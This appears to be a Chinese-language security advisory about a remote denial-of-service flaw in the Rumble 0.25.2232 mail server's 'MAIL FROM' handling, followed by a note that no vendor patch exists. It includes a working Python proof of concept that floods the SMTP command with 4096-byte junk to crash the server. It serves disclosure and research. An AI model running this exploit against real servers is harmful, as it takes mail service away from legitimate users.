影响版本:
Humbedooh Rumble 0.25.2232
漏洞描述:
Rumble是以ANSI C编写的邮件服务器,对大多数服务和邮件扩展实现模块化管理。 Rumble邮件服务器在"MAIL FROM"命令的实现上存在远程拒绝服务漏洞,远程攻击者可利用此漏洞造成受影响应用程序崩溃,拒绝服务合法用户。
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
import socket host = 'localhost' tld = 'mydomain.tld' port = 25 def crash(): for i in range(0, 16): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.settimeout(32) junk = 'A' * 4096 print s.recv(8192) s.send('HELO ' + tld + '\r\n') print s.recv(8192) s.send('MAIL FROM ' + junk + '\r\n') print s.recv(8192) s.close() crash()
安全建议:
厂商补丁: Rumble ------ 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://rumbleserver.sourceforge.net/
0 条评论。